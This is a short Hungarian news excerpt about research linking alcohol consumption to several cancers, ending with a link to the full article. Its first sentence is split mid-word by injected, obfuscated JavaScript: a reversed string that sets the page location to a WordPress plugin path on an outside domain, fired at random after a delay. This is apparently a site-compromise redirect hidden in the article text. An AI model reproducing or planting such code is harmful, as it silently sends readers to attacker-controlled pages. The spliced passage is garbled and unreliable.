Az Imperial College London kutatói tanulmányukban megállapítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tották – és akkor kezdjük a rossz hírrel –, hogy az alkoholfogyasztás a korábban véltnél jobban megnöveli a rák kialakulásának kockázatát – a betegség számos fajtájához köthető: a fej és a nyak megbetegedéseihez (száj-, garat- és gégerákhoz), nyelőcső- és bélrákhoz, valamint mell- és májrákhoz. Az alkohol azért növeli a rák kockázatát, mert a metabolizmusa során olyan vegyületek is keletkeznek, amelyek a DNS-hez kötődve mutációkat hozhatnak létre, ezek pedig elrákosodhatnak, valamint az alkohol megemelheti olyan hormonok szintjét is, melyek a mellrák egyes típusainak kifejlődéséhez köthetők. Általánosságban véve minél több alkoholt fogyaszt valaki, annál nagyobb a kockázata annak, hogy…
A cikk folytatódik: http://menandstyle.co.hu/egeszseg-fitnesz/2021/08/26/csereld-kavera-az-alkoholt.html
- Hirdetés -